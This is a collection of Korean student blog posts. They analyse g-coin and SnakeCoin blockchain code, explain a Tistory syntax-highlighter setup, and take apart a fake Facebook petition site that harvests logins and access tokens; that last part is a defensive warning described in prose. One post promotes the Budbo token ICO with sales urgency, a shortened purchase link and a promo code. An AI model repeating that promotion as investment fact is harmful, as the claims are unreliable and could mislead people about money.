다음 게시글에서는 서버에서 실행환경을 구축하여 실제로 동작을 하는지를 확인하도록 하겠습니다.


읽어주셔서 감사합니다.


'0x30 Study > 0x32 Blockchain' 카테고리의 다른 글

g-coin 분석(2)  (2) 2018.03.05
g-coin 분석(1)  (1) 2018.03.03
g-coin 분석(0)  (0) 2018.03.01
BlockChain을 공부하자! (0)  (0) 2018.02.28

댓글 1

안녕하세요.


저는 공주대학교 컴퓨터공학부 컴퓨터소프트웨어전공 17학번 문승현입니다.


현재 블록체인 기술에 대해 공부를 하여 공부한 내용을 정리하고자 게시글을 작성하였습니다.


미리 읽어주시는 분들께 감사하며 잘못된 지식이 있을 경우 마음 편하게 피드백주시면 감사하겠습니다.



먼저 제가 깃허브를 돌아다니다 괜찮은 자료를 발견하여 분석을 시작한 코인의 깃허브 주소입니다.


https://github.com/golbin/g-coin



먼저 다운받게 되면 위와 같이 파일들이 있습니다.


golbin

- app.py

- gcoin

    - blockchain.py 

    - block.py

    - book.py

    - config.py

    - miner.py

    - node.py

    - proof.py

    - __pycache__

    - requirements.txt

    - transaction.py


패키지

requirements.txt를 열어보게 되면 패키지의 버전은 아래와 같음을 알 수 있습니다.

Flask==0.12.2
requests==2.18.4

그리고 깃허브를 보면 파이썬의 버전은 3.6 이상의 버전임을 알 수 있습니다.

정리하자면 아래와 같습니다.

Python >= 3.6
Flask >= 0.12
Requests >= 2.18

패키지 설치

pip3 install -r ./requirements.txt 

분석


app.py

 hubeen@SeunghyunSeverx64 >>> ~/study/block/golbin >>> cat app.py

from argparse import ArgumentParser

from flask import Flask, jsonify, request

from gcoin.node import Node
from gcoin.miner import Miner
from gcoin.blockchain import BlockChain
from gcoin.transaction import Transaction


app = Flask('g-coin')

app.node = Node()
app.miner = Miner(app.node.id)
app.blockchain = BlockChain()


@app.route('/transaction', methods=['POST'])
def add_transaction():
    # data.sender(str)
    # data.recipient(str)
    # data.amount(int)
    data = request.get_json()

    transaction = Transaction.init_from_json(data)

    try:
        next_index = app.blockchain.add_transaction(transaction)
    except Exception as e:
        return jsonify({'message': str(e)}), 403

    response = {'message': 'Transaction will be added to {next_index}th block.'}

    return jsonify(response), 201


@app.route('/transaction', methods=['GET'])
def get_pending_transactions():
    transactions = [t.dump() for t in app.blockchain.transactions]

    return jsonify(transactions), 201


@app.route('/mine', methods=['POST'])
def mine():
    """Mining
    Have to make a standalone process
    But it's just a prototype
    """
    block = app.miner(app.blockchain)

    response = {
        'message': "New block is mined!",
        'block': block.dump()
    }

    return jsonify(response), 200


@app.route('/chain', methods=['GET'])
def get_full_chain():
    response = {
        'chain': app.blockchain.dump(),
        'length': len(app.blockchain)
    }

    return jsonify(response), 200


@app.route('/node', methods=['GET'])
def get_all_nodes():
    response = {
        'nodes': list(app.node.neighbor),
        'total': len(app.node)
    }

    return jsonify(response), 201


@app.route('/node', methods=['POST'])
def add_node():
    # data.address(str)
    data = request.get_json()

    app.node.add(data['address'])

    response = {
        'message': 'New app.node is added.',
        'total': len(app.node)
    }

    return jsonify(response), 201


@app.route('/chain/valid', methods=['GET'])
def valid_chain():
    valid = app.blockchain.valid()

    response = {'result': valid}

    return jsonify(response), 200


@app.route('/consensus', methods=['POST'])
def consensus():
    new_blockchain = app.node.consensus_with_neighbor(app.blockchain)

    if new_blockchain:
        app.blockchain = new_blockchain
        response = {'message': 'Our chain was replaced.'}
    else:
        response = {'message': 'I\'m King of the World.'}

    return jsonify(response), 200


if __name__ == '__main__':
    parser = ArgumentParser()
    parser.add_argument('--port', default=5000, type=int)
    args = parser.parse_args()

    app.run(host='0.0.0.0',port=args.port)


보게 되면 --port 로 받은 인자를 int 형으로 플라스크의 포트로 설정하는 것을 볼 수 있습니다.

네, app.py는 그냥 플라스크를 실행하는 것을 알 수 있습니다.


아, 참 깃허브에서 받은 코드가 다른 부분이 있습니다.


app.run(host='0.0.0.0',port=args.port)


바로 이 부분인데요.


아마 host='0.0.0.0'이 없으실겁니다.


저는 외부 접속을 허용하기 위해 이 부분에 코드를 추가하였습니다.


config.py

# for the first chain
GENESIS_HASH = 'g'

# for mining rewards
GENESIS_ACCOUNT_ID = '0'
AMOUNT_OF_REWARD = 1

# for proof of work
DIFFICULTY = 1  # number of digits is difficulty
PROOF_DIGITS = '0'  # Finding PROOF_DIGITS * DIFFICULTY ('00', '000', ..) is proof of work


config.py부터 보도록 하겠습니다.


GENESIS_HASH = 'g'


첫번째의 체인의 해쉬를 설정하는 부분입니다.


GENESIS_ACCOUNT_ID = '0'
AMOUNT_OF_REWARD = 1


채굴을 할 때에 나누어줄 갯수와 초기의 계정의 아이디를 설정하는 부분입니다.

쉽게 말하면 '신', '관리자'의 계정을 설정하는 부분입니다.


DIFFICULTY = 1  # number of digits is difficulty
PROOF_DIGITS = '0'  # Finding PROOF_DIGITS * DIFFICULTY ('00', '000', ..) is proof of work


채굴에 대해 난이도를 설정하는 부분입니다.

현재의 코드는 난이도가 1로 설정이 되어있어 PROOF_DIGITS * 1로 '0' 되어있습니다.

이 난이도가 2로 설정이 되면 PROOF_DIGITS * 2가 되어 '00' 으로 동작한다는 것을 주석을 통해 알 수 있었습니다.


block.py

import json
import hashlib
from time import time

import gcoin.config as cfg
from gcoin.transaction import Transaction


class BlockHeader:
    def __init__(self, previous_hash=None, timestamp=0,
                 difficulty=0, proof=0):
        """Block

        Args:
            previous_hash (str):
            timestamp (float):
            difficulty (int):
            proof (int):
        """
        self.previous_hash = previous_hash
        self.timestamp = timestamp if timestamp else time()
        self.difficulty = difficulty if difficulty else cfg.DIFFICULTY
        self.proof = proof

    def hash(self):
        """Make hash of a header of current block for finding proof

        Don't use 'proof' because there is no 'proof' in new block at the first time.
        """
        header_dump = self.dump()
        header_dump.pop('proof', None)
        header_dump = json.dumps(header_dump, sort_keys=True).encode()
        header_hash = hashlib.sha256(header_dump).hexdigest()

        return header_hash

    def dump(self, proof=True):
        data = {
            'previous_hash': self.previous_hash,
            'timestamp': self.timestamp,
            'difficulty': self.difficulty
        }

        if proof:
            data['proof'] = self.proof

        return data

    @classmethod
    def init_from_json(cls, data):
        return cls(data['previous_hash'],
                   data['timestamp'],
                   data['difficulty'],
                   data['proof'])


class Block:
    def __init__(self, transactions, previous_hash=None):
        """Block

        Args:
            transactions (list): list of Transaction object
            previous_hash (str):
        """
        self.transactions = transactions
        self.header = BlockHeader(previous_hash)

    @property
    def previous_hash(self):
        return self.header.previous_hash

    @property
    def difficulty(self):
        return self.header.difficulty

    @property
    def proof(self):
        return self.header.proof

    @proof.setter
    def proof(self, value):
        self.header.proof = value

    def hash(self):
        """Make hash of current block"""
        block_dump = json.dumps(self.dump(), sort_keys=True).encode()
        block_hash = hashlib.sha256(block_dump).hexdigest()

        return block_hash

    def dump(self):
        return {
            'header': self.header.dump(),
            'transactions': [t.dump() for t in self.transactions]
        }

    @classmethod
    def init_from_json(cls, data):
        transactions = [Transaction.init_from_json(t)
                        for t in data['transactions']]

        header = BlockHeader.init_from_json(data['header'])

        self = cls(transactions)

        self.header = header

        return self


블록의 구조를 볼 수 있는 코드입니다.


transactions : 거래 정보들

previous_hash : 이전 해쉬

proof : 보상?

timestamp : 블록이 생성된 시간

hash : 자기 블록의 해쉬

difficulty : 어려움?


import gcoin.config as cfg


일단 아까 저희가 처음에 본 config.py를 임포트하는 것을 볼 수 있습니다.


self.difficulty = difficulty if difficulty else cfg.DIFFICULTY


난이도를 설정한 것을 불러와 대입을 하는 것을 볼 수 있습니다.


class BlockHeader:
    def __init__(self, previous_hash=None, timestamp=0,
                 difficulty=0, proof=0):
        """Block

        Args:
            previous_hash (str):
            timestamp (float):
            difficulty (int):
            proof (int):
        """
        self.previous_hash = previous_hash
        self.timestamp = timestamp if timestamp else time()
        self.difficulty = difficulty if difficulty else cfg.DIFFICULTY
        self.proof = proof

    def hash(self):
        """Make hash of a header of current block for finding proof

        Don't use 'proof' because there is no 'proof' in new block at the first time.
        """
        header_dump = self.dump()
        header_dump.pop('proof', None)
        header_dump = json.dumps(header_dump, sort_keys=True).encode()
        header_hash = hashlib.sha256(header_dump).hexdigest()

        return header_hash

    def dump(self, proof=True):
        data = {
            'previous_hash': self.previous_hash,
            'timestamp': self.timestamp,
            'difficulty': self.difficulty
        }

        if proof:
            data['proof'] = self.proof

        return data

    @classmethod
    def init_from_json(cls, data):
        return cls(data['previous_hash'],
                   data['timestamp'],
                   data['difficulty'],
                   data['proof'])


인자는 4개로 previous_hash, timestamp, difficulty, proof가 있습니다.

previous_hash : string 타입으로 이전 블록의 해쉬 값입니다.

timestamp : float 타입으로 블록의 생성 시간입니다.

difficulty : int 타입으로 난이도 결정의 값입니다.

proof : int 타입으로 아직까지 무슨 역할을 하는 아이인진 모르겠네요.


인자를 받으며 에러를 위해 초기 값들은 None, 0, 0, 0으로 설정하는 것을 볼 수 있습니다.

현재 자기 자신의 값에 받은 값을 대입하는 것을 볼 수 있습니다.


hash()

header_dump = self.dump() header_dump.pop('proof', None) header_dump = json.dumps(header_dump, sort_keys=True).encode() header_hash = hashlib.sha256(header_dump).hexdigest()

블록 정보를 덤프를 뜨며 덤프를 뜬 내용을 json형식으로 만든 뒤 대입을 하는 것을 볼 수 있습니다.
그 뒤에 블록 해쉬에 sha256 알고리즘으로 암호화하여 hex형식으로 대입을 하네요.

init_from_json()

def init_from_json(cls, data):
        return cls(data['previous_hash'],
                   data['timestamp'],
                   data['difficulty'],
                   data['proof'])


JSON 데이터를 받아 블록정보를 초기화합니다.


dump()

def dump(self, proof=True):
        data = {
            'previous_hash': self.previous_hash,
            'timestamp': self.timestamp,
            'difficulty': self.difficulty
        }

        if proof:
            data['proof'] = self.proof

        return data


블록의 정보를 반환해주는 함수입니다.



class Block:
    def __init__(self, transactions, previous_hash=None):
        """Block

        Args:
            transactions (list): list of Transaction object
            previous_hash (str):
        """
        self.transactions = transactions
        self.header = BlockHeader(previous_hash)

    @property
    def previous_hash(self):
        return self.header.previous_hash

    @property
    def difficulty(self):
        return self.header.difficulty

    @property
    def proof(self):
        return self.header.proof

    @proof.setter
    def proof(self, value):
        self.header.proof = value

    def hash(self):
        """Make hash of current block"""
        block_dump = json.dumps(self.dump(), sort_keys=True).encode()
        block_hash = hashlib.sha256(block_dump).hexdigest()

        return block_hash

    def dump(self):
        return {
            'header': self.header.dump(),
            'transactions': [t.dump() for t in self.transactions]
        }

    @classmethod
    def init_from_json(cls, data):
        transactions = [Transaction.init_from_json(t)
                        for t in data['transactions']]

        header = BlockHeader.init_from_json(data['header'])

        self = cls(transactions)

        self.header = header

        return self


transactions : list 타입으로 거래 정보들이 들어있는 곳입니다.

previous_hash : string 타입으로 이전 해쉬 값이 들어있는 곳입니다.


그리고 함수들의 역할은 위에서 설명한 함수들과 같은 역할을 하는 아이들이라 딱히 큰 설명은 없이 넘어가도 될 것 같습니다.


transaction.py

class Transaction:
    def __init__(self, sender, recipient, amount):
        """Transaction

        Args:
            sender (str):
            recipient (str):
            amount (int): positive number
        """
        self.sender = sender
        self.recipient = recipient
        self.amount = amount

        if amount < 1:
            raise Exception('Amount have to be positive number.')

    def dump(self):
        return {
            'sender': self.sender,
            'recipient': self.recipient,
            'amount': self.amount
        }

    @classmethod
    def init_from_json(cls, data):
        return cls(data['sender'],
                   data['recipient'],
                   data['amount'])


파일 명을 보고 딱 알아차릴 수 있겠네요!

거래정보를 관련하는 아이일 것이라 예상할 수 있었습니다.


인자는 3개로 sender, recipient, amount 입니다.


sender : string 타입으로 보내는 이의 정보가 담기는 변수입니다.

recipient : string 타입으로 받는 이의 정보가 담기는 변수입니다.

amount : int 타입으로 보낼 갯수가 담기는 변수입니다.


if amount < 1:
            raise Exception('Amount have to be positive number.')

amount가 1보다 작을 수 없습니다.
그야 당연하죠 !
0개를 보낼 순 없잖아요? (웃음)

dump()

    def dump(self):
        return {
            'sender': self.sender,
            'recipient': self.recipient,
            'amount': self.amount
        }

거래 정보를 반환해주는 함수입니다.

init_from_json()

    def init_from_json(cls, data):
        return cls(data['sender'],
                   data['recipient'],
                   data['amount'])


json 값을 초기화해주는 함수입니다.


book.py

"""account book"""
import gcoin.config as cfg


class Account:
    def __init__(self):
        self.target = []  # sender or recipient
        self.amount = []  # - / + amount

    def sum(self):
        return sum(self.amount)

    def add(self, target, amount):
        self.target.append(target)
        self.amount.append(amount)


class Book:
    def __init__(self):
        self.account = {}

    def check_balance(self, transaction):
        """Check sender's balance
        TODO: check balance in transactions in next blocks

        Args:
            transaction (obj): Transaction object

        Returns:
            bool:
        """
        if transaction.sender == cfg.GENESIS_ACCOUNT_ID:  # for mining rewards
            return True
        if transaction.sender in self.account:
            account = self.account[transaction.sender]
            return account.sum() - transaction.amount >= 0
        else:
            return False

    def get_account(self, account_id):
        if account_id not in self.account:
            self.account[account_id] = Account()

        return self.account[account_id]

    def apply(self, transactions):
        """Add new transactions to book in new block

        Args:
            transactions (obj): Transaction object
        """
        for t in transactions:
            sender = self.get_account(t.sender)
            recipient = self.get_account(t.recipient)

            sender.add(recipient, -t.amount)
            recipient.add(sender, t.amount)


book이라니? 이게 무슨 녀석인지 이해가 안됬지만 코드를 보고 대략 파악이 가능했습니다.

계정에 대해 갯수를 반환해주는 아이엿습니다.

쉽게 말하면 통장정도가 되겠네요.


여기에도 두개의 클래스가 있습니다.


class Account:
    def __init__(self):
        self.target = []  # sender or recipient
        self.amount = []  # - / + amount

    def sum(self):
        return sum(self.amount)

    def add(self, target, amount):
        self.target.append(target)
        self.amount.append(amount)


sum()

말 그대로 갯수를 더해주는 함수입니다.
갯수를 -, +로 빼고 더하고를 할 수 있겠네요.

add()

타겟에 타겟을 추가하고 갯수에 갯수를 추가합니다.


class Book:
    def __init__(self):
        self.account = {}

    def check_balance(self, transaction):
        """Check sender's balance
        TODO: check balance in transactions in next blocks

        Args:
            transaction (obj): Transaction object

        Returns:
            bool:
        """
        if transaction.sender == cfg.GENESIS_ACCOUNT_ID:  # for mining rewards
            return True
        if transaction.sender in self.account:
            account = self.account[transaction.sender]
            return account.sum() - transaction.amount >= 0
        else:
            return False

    def get_account(self, account_id):
        if account_id not in self.account:
            self.account[account_id] = Account()

        return self.account[account_id]

    def apply(self, transactions):
        """Add new transactions to book in new block

        Args:
            transactions (obj): Transaction object
        """
        for t in transactions:
            sender = self.get_account(t.sender)
            recipient = self.get_account(t.recipient)

            sender.add(recipient, -t.amount)
            recipient.add(sender, t.amount)


현재 계정을 초기화하네요.

dicinary 타입으로 계정마다 갯수를 정하게 하는 것 같습니다.


check_balance()

transaction : 거래 내용
리턴 타입은 True, False 라고 합니다.

if transaction.sender == cfg.GENESIS_ACCOUNT_ID: # for mining rewards return True


만약 보내는 이가 '신', '관리자' 계정이면 무조건 True가 되네요.

이에 대한 코드는 보안에 대한 취약점이 되지 않을까 싶습니다.


if transaction.sender in self.account:
            account = self.account[transaction.sender]
            return account.sum() - transaction.amount >= 0
        else:
            return False


거래 내용에 보내는 이가 계정 안에 있으면 계정에 대한 갯수를 보내거나 지불하는 것을 볼 수 있으며 계정 안에 없을 경우에는 False를 리턴하는 것을 볼 수 있습니다.


get_account()

account_id : 계정의 아이디입니다.

account이 없을 경우 계정을 생성하네요.
그 외에는 그 계정을 반환해주는 함수입니다.

apply()

transactions : 거래 기록들을 담는 변수입니다.

거래 기록들중에 계정 정보를 받아 보내는 이와 받는 이를 변수에 대입합니다.
그리고 보내는 이는 그 만큼의 코인을 - 하며 받는 이는 그 만큼의 코인을 더합니다.


남은 blockchain.py, miner.py, node.py, proof.py 는 다음 게시글에서 정리하도록 하겠습니다.


읽어주셔서 감사합니다.

'0x30 Study > 0x32 Blockchain' 카테고리의 다른 글

g-coin 분석(2)  (2) 2018.03.05
g-coin 분석(1)  (1) 2018.03.03
g-coin 분석(0)  (0) 2018.03.01
BlockChain을 공부하자! (0)  (0) 2018.02.28

댓글 0

글을 작성하게 된 계기



이번에 블록체인 글을 작성하면서 처음으로 게시글 공유가 5개가 넘어가는 멋진 일이 일어나며 좋은 피드백을 받게 되어 작성하게 되었습니다.


적용하는데는 큰 어려움이 없으므로 많으신 분들이 이 게시글을 보고 도움이 되었으면 좋겠습니다.


게시글을 보시며 어려움이 생기신다면 언제든지 댓글을 남겨주시면 글을 더 쉬운 방향으로 수정하도록 하겠습니다.


코드 하이라이트(Syntax Highlighter) 다운로드

먼저 사용을 하시려면 코드 하이라이트(Syntax Highlighter)를 다운받아야겠죠?

다운은 아래의 링크에서 받으시면 됩니다!

다운로드 링크 : https://github.com/syntaxhighlighter/syntaxhighlighter

여기까지 따라오셨나요?

그렇다면 다음 차례로 넘어오시면 될 것 같습니다!!!

티스토리에 다운받은 코드 하이라이트(Syntax Highlighter) 업로드

다운받으시면 압축을 풀은 나오는 폴더들에 scripts 폴더와 styles 폴더의 파일만 업로드 하면 됩니다.

[업로드 해야 될 파일]
코어 필수 파일 : scripts/shCore.js
언어 신텍스 스크립트 파일 : scripts/shBrush*.js
스타일 선택 파일 : styles/shCore*.css
신텍스 테마 파일 : styles/shTheme*.css

그렇다면 업로드 해주세요!

2018년도 기준으로 블로그 관리 -> 스킨 편집 -> html 편집 -> 파일 업로드로 이동해주세요!


위와 같이 업로드되셨다면 2단계까지 잘 따라오신 겁니다!

어? images로 업로드되셨다구요?

괜찮습니다! 


파일을 불러올 때에 경로만 잘 잡아주게 되면 상관이 없습니다!


코드 하이라이트(Syntax Highlighter) 적용

이제 파일들도 다운로드하고 티스토리에 업로드를 하였다면 이것을 사용해야겠죠?
이 파일들은 css, js 파일이므로 <head></head> 사이에 태그를 입력해주셔야 됩니다.
저는 모든 코드들을 일단 적용하였습니다.

<script type='text/javascript' src='./images/shCore.js'></script>
<script type='text/javascript' src='./images/shAutoloader.js'></script>
<script type='text/javascript' src='./images/shBrushAppleScript.js'></script>
<script type='text/javascript' src='./images/shBrushBash.js'></script>
<script type='text/javascript' src='./images/shBrushColdFusion.js'></script>
<script type='text/javascript' src='./images/shBrushCpp.js'></script>
<script type='text/javascript' src='./images/shBrushCSharp.js'></script>
<script type='text/javascript' src='./images/shBrushCss.js'></script>
<script type='text/javascript' src='./images/shBrushDelphi.js'></script>
<script type='text/javascript' src='./images/shBrushDiff.js'></script>
<script type='text/javascript' src='./images/shBrushErlang.js'></script>
<script type='text/javascript' src='./images/shBrushGroovy.js'></script>
<script type='text/javascript' src='./images/shBrushJava.js'></script>
<script type='text/javascript' src='./images/shBrushJavaFX.js'></script>
<script type='text/javascript' src='./images/shBrushJScript.js'></script>
<script type='text/javascript' src='./images/shBrushPerl.js'></script>
<script type='text/javascript' src='./images/shBrushPhp.js'></script>
<script type='text/javascript' src='./images/shBrushPlain.js'></script>
<script type='text/javascript' src='./images/shBrushPowerShell.js'></script>
<script type='text/javascript' src='./images/shBrushPython.js'></script>
<script type='text/javascript' src='./images/shBrushRuby.js'></script>
<script type='text/javascript' src='./images/shBrushSass.js'></script>
<script type='text/javascript' src='./images/shBrushScala.js'></script>
<script type='text/javascript' src='./images/shBrushSql.js'></script>
<script type='text/javascript' src='./images/shBrushVb.js'></script>
<script type='text/javascript' src='./images/shBrushXml.js'></script>
<script type='text/javascript' src='./images/shLegacy.js'></script>
<link href="./images/shCoreDefault.css" rel="stylesheet" type="text/css">

<link href="./images/shThemeDefault.css" rel="stylesheet" type="text/css">

<script type="text/javascript">
//<![CDATA[
                SyntaxHighlighter.config.bloggerMode = true;
                SyntaxHighlighter.all();
//]]>
</script>

여기까지 따라오셨다면 잘 따라오신겁니다!


크롬 브라우저를 위하여!

크롬 브라우저로 접속하는 사람들을 위해 아래의 코드를 css에 입력해주세요

 div .syntaxhighlighter {
    overflow-y: hidden!important; overflow-x: auto!important;
    font-size:0.9em !important;
}



어디에든 입력만 하시면 상관이 없습니다.


코드 하이라이트(Syntax Highlighter) 사용하기

코드 하이라이트를 사용하기 위해서는 pre 태그를 이용해야되기 때문에 html 편집을 이용하셔야 됩니다.
그리고 아래의 코드를 입력하시면 됩니다.

<pre class= "brush:브러쉬">
    코드
</pre>

브러쉬 명



잘 사용하시길 바랍니다!


댓글 0

안녕하세요.


저는 공주대학교 컴퓨터공학부 컴퓨터소프트웨어전공 17학번 문승현입니다.


현재 블록체인 기술에 대해 공부를 하여 공부한 내용을 정리하고자 게시글을 작성하였습니다.


미리 읽어주시는 분들께 감사하며 잘못된 지식이 있을 경우 마음 편하게 피드백주시면 감사하겠습니다.


현재 게시글에 대한 깃허브는 아래에 주소를 기입하도록 하겠습니다.


https://github.com/schedutron/SnakeCoin


블록 내부 구조


 class Block:
    def __init__(self, index, timestamp, data, previous_hash):
        self.index = index
        self.timestamp = timestamp
        self.data = data
        self.previous_hash = previous_hash
        self.hash = self.hash_block()

    def __str__(self):
        return 'Block #{}'.format(self.index)

    def hash_block(self):
        sha = hasher.sha256()
        seq = (str(x) for x in (
               self.index, self.timestamp, self.data, self.previous_hash))
        sha.update(''.join(seq).encode('utf-8'))
        return sha.hexdigest()


index : 현재 블록의 위치 (첫 블록 0)

timestamp : 블록이 생성된 시간

data : 블록체인에 포함하고자 하는 데이터

previous_hash = 이전 블록의 해쉬

hash : sha256으로 index + timestamp + data + previous_hash들을 암호화함


함수 분석

* 현재 저는 깃허브에 올라와있는 코드들을 한 곳으로 모아놨으므로 깃허브와 함수 이름 혹은 코드가 다를 수 있습니다.


 
 def make_genesis_block():
    """Make the first block in a block-chain."""
    block = Block(index=0,
                  timestamp=datetime.now(),
                  data="Genesis Block",
                  previous_hash="0")
    return block

make_genesis_block()

위의 함수는 코드를 보시면 아시겠지만 index를 0으로 설정하여 현재 시간과 데이터는 Genesis Block 이라는 문장과 이전 해쉬가 없기때문에 0으로 설정되어 블록이 생성되는 것을 볼 수 있습니다.

첫번째 블록을 만드는 함수라는 것을 알 수 있습니다.



def next_block(last_block, data=''): """Return next block in a block chain.""" idx = last_block.index + 1 block = Block(index=idx,

timestamp=datetime.now(),

data='{}{}'.format(data, idx),

previous_hash=last_block.hash)

return block

next_block(last_block, data='')

인자는 2개로 하나는 이전 블록을 넘겨받으며, 새로 추가할 데이터를 받는 것을 볼 수 있습니다.

idx 는 이전 블록의 인덱스 +1 을 한 값으로 설정된 뒤에 인덱스를 넣으며 새로운 블럭이 생성되는 것을 볼 수 있습니다.

그렇습니다.

이전 블럭을 받아 새로운 블럭을 만드는 함수라는 것을 알 수 있었습니다.



채굴 알고리즘

처음에 블록체인을 공부하다 채굴이라는 개념을 잡기가 많이 어려웠습니다.

멘토님에게 질문을 드렸는데

새로운 블럭을 생성하는 것이 채굴이라는 것을 알게 되었다.


그렇다 이 코드에서 채굴 알고리즘은 있지 않다.


이쯤에서 채굴이 무엇인지 Araboza.


채굴

* 채굴 필요성

   - 공급자 역할

   - 수요공급법칙

* 작업 증명 : (Proof of Work) 

   - 작업 증명은 새로운 블록을 블록체인에 추가하는 ‘작업’을 증명한다는 것이라고 한다.


그렇다면 현재보다 채굴의 난이도를 올리는 방법은 무엇이 있을까?


뭐 딜레이를 줘서 간단하게 난이도를 올리는 방법과 암호화 알고리즘들을 사용하여 브루트포싱 기법으로 때려맞춰서 난이도를 올리는 방법들이 있다고 합니다!


필자는 후자의 방법을 사용하였습니다.


코드는 아래와 같습니다.




 
 def next_block(last_block, data, i):
    """Return next block in a block chain."""
    sw = False
    while(sw == False):
        print("mining...")
        if(base64.b64encode(str(i)) == base64.b64encode(str(random.randrange(0, i+1)))):
            sw = True;
        else:
            sw = False;

    if(sw):
        idx = last_block.index + 1
        block = Block(index=idx, timestamp=datetime.now(), data='{}{}'.format(data, idx),previous_hash=last_block.hash)

    return block


간단한 코드로써 브루트 포싱으로 채굴을 하게 해보았다.

random 함수로 n번째로 생성되는 블럭의 n을 암호화한 값을 랜덤으로 초이스하여 때려맞추는 브루트 포싱으로 채굴되게 해보았다.



난이도는 채굴이 된 블럭 수 만큼 증가하는 것을 볼 수 있었다.


이것에 대해 더 채굴 난이도를 올리고자하면 많은 코인들이 사용하는 암호화 알고리즘을 이용하여 코드를 작성한다면 난이도는 많이 올를 것이라는 것을 알게 되었다.


'0x30 Study > 0x32 Blockchain' 카테고리의 다른 글

g-coin 분석(2)  (2) 2018.03.05
g-coin 분석(1)  (1) 2018.03.03
g-coin 분석(0)  (0) 2018.03.01
BlockChain을 공부하자! (0)  (0) 2018.02.28

댓글 0


부보 토큰은 의료 목적인 대마초 토큰입니다.


해외에서 이미 상용화되어 앱으로 개발되어 사용되고 있었으며 이번에 ICO를 통해 토큰으로 거래되게할 예정입니다.


각 운송되는 트럭들에 위치추적 부품이 달려있어서 블록체인 기술을 통해 유통되는것을 추적도 가능하게 되어 안전한 거래가 될 수 있다는 장점이 있습니다.


위의 내용은 백서에 나와있는 내용들이니 백서를 읽어보심을 추천드립니다.


백서 - https://budbo.io/budbo-whitepaper.pdf


이 부보 회사는 2017년도부터 활동을 하여 많이 알려왔습니다.



최근에 크립토 이코노미 월드투어에 런던에서 부보가 발표를 하였는데

이 다음날 7빌리온이나 팔렸습니다.



이제 곧 암스테르담에 발표를 남겨두고 있습니다.



얼마 남지 않은 1,620,799개 정도 남은 상태에 급하게 얼릉 사시고 싶어하실텐데요!


참여방법을 알려드리도록 하겠습니다.


https://goo.gl/XMVLY4


접속하신 뒤 회원가입을 한 뒤에 



보내실 코인의 종류를 선택하셔서 주소를 생성한 뒤에 그 주소로 코인을 보내면 됩니다.


현재 gazua 프로모션 코드를 이용하면 싼 가격으로 구매가 된다고 합니다.


부보에 대한 정보를 계속 받아보시고 싶으시다면 https://open.kakao.com/o/gT9oxgG 에 들어오시면 감사하겠습니다.


======== 개인 지갑 만드는 법 =========


https://www.myetherwallet.com/ 


먼저 위의 사이트를 접속해주세요.



먼저 사용하시는 비밀번호를 입력하시고 지갑 생성을 눌러주세요.



이렇게하면 지갑이 생성됩니다.


Keystore 파일은 미리 저장! 해주세요!!

이 keystore 파일로 지갑에 접근을 할 수 있습니다.


그 뒤에 I Understand 를 누르시면 



위의 Private Key도 저장해주세요!


키 파일은 파일 안에 지갑 정보가 저장되어 이 파일만 넘겨주면 초기에 입력한 패스워드를 입력하면 접근이 되는것이구요.

Private Key는 지갑에 접근하기 위해 입력하는 비밀번호라고 생각하시면 편할 것 같습니다.


이렇게 키 파일이나 Private 키를 입력하며 지갑에 접근하면 아래와 같은 화면을 볼 수 있습니다.



그리고 저 내 주소에 적혀있는 주소를 부보 프로필에 주소 적는 란에 적으시면 완료입니다 ^^



======== 추가 정보 =========


1. 다 팔리지 않은 토큰들은 소각될 예정


2. 해외 유투버들의 관심이 생기고 있다.


'0x01 Etc. > 0x06 Coin' 카테고리의 다른 글

[ICO Info] Budbo(부보) 코인 ICO  (2) 2018.01.25

Comment 2

주요기능

공주대학교 공과대학 정문에 있는 피시방 자리 유무를 조회


개발하게 된 이유

기숙사에서 정문까지 10분거리이며 왕복이면 20분이기에 갔다가 자리가 없어서 돌아오면 시간낭비가 되버리기때문에
그래서 만들게 되었다.


프로젝트 이름이 CampPC 인 이유

피시방 이름이 캠프 피시방임.


개발 언어

Python + php + html + css

개발 환경

MAC, Ubuntu


주저리 주저리

사실 이미 다 만들었지만 기록용으로 작성하는 중.


'0xe0 Project > 0xe3 CampPC' 카테고리의 다른 글

[CampPC] 0x0 Start  (0) 2017.10.09

댓글 0

페이스북을 하다가 우연하게 사이트를 발견하였다.



이런 사이트를 발견해서 접속해보니 운동을 위해 도메인도 구매하고 사이트를 운영하는가 싶었다.

매우 착한 사람이며 운동정신이 투철하신분인가 싶기도 했다.



보니까 frame으로 의문의 사이트를 속이기위해 noframe 으로 프레임이 안보이게 숨겨둠

그리고 모바일 유저들을 타겟으로 만든거라고 추측가능했따.

보면 관심이나 다른 기능들은 되지 않는 걸로 봐서 페이크 페이지라는걸 알 수 있었당.



보면 #u_o_6 이 클릭됬을때 아래의 코드들이 실행되는데.

#u_o_6은 바로 로그인 버튼이며 #u_0_2_1, 2 의 내용을 fbid, fbpw 변수에 넣는데 그렇다 이건 우리가 입력한 내용이 저 변수에 들어가서 쇼쇽 쉬식하는 것을 알 수 있다.

그래서 ajax로 submit_login.php로 아이디와 비번을 전송하는데.

이건 실제 페이스북의 사이트에 로그인하는 것이 아닌 자신의 서버에 작성한 php 코드에 전송을 하는것이다.

여기서 개발자의 사이트에 본인의 아이디 비번이 수집될 수도 있다는 점을 조심해야된다.


show_next 함수는 말그대로 아이디 패스워드를 얻었으니 로그인이 되는 것처럼 넘어가는 것이다.



그러타 이거슨 토큰 값을 보여주는 거시다.



걍 로그인을 하고 넘어가면



당연히 에러가 뜬다.
멍청한 개발자는 이런것도 예외처리 안함 ㅎ;;ㅋ;;;
그리고 멍청한 사람들은 저 값을 그대로 밑에다 붙어넣고 서명하기를 누르겠지?
그걸 누르면 아래와 같이 실행된다.



#u_0_6_1 는 서명하기 버튼이다.

클릭 될 경우 아래의 코드가 실행되는 것인데.

현재 붙여넣기한 내용이 비어있으면 넣어달라고 문자를 띄우고 붙여넣으면 이제 실제로 로그인이 안된 값들은 제대로 해달라고 띄우고 그냥 특정 실패 문자열이 있으면 안받아줌.

그리고 제대로 토큰값을 넘겨준 애들한테는 RunToken() 함수를 실행하는



감사하게 우리의 넘겨준 토큰을 서버에 저장하는 것이다.



몽총하게 넘겨준 사람들은 비밀번호를 변경하고 로그아웃을 하자.



참고로 얘네 index숫자.html 에서 숫자만 변경해도 다른 설문 사이트들이 나온다.




이것은 index1의 페이지이당.

보니까 그냥 이슈 터지는 것들마다 추가해서 어그로를 끌어서 토큰을 수집하는 애들이므로 조심합시당.


3줄 요약

0. 이것은 페이크사이트이다.

1. 아이디, 비밀번호, 토큰을 수집한다. (물론 아이디, 비번 수집하는진 자세힌 모름 하지만 전송하는 걸로 봐서는 수집할지도 모름 ㅎ)

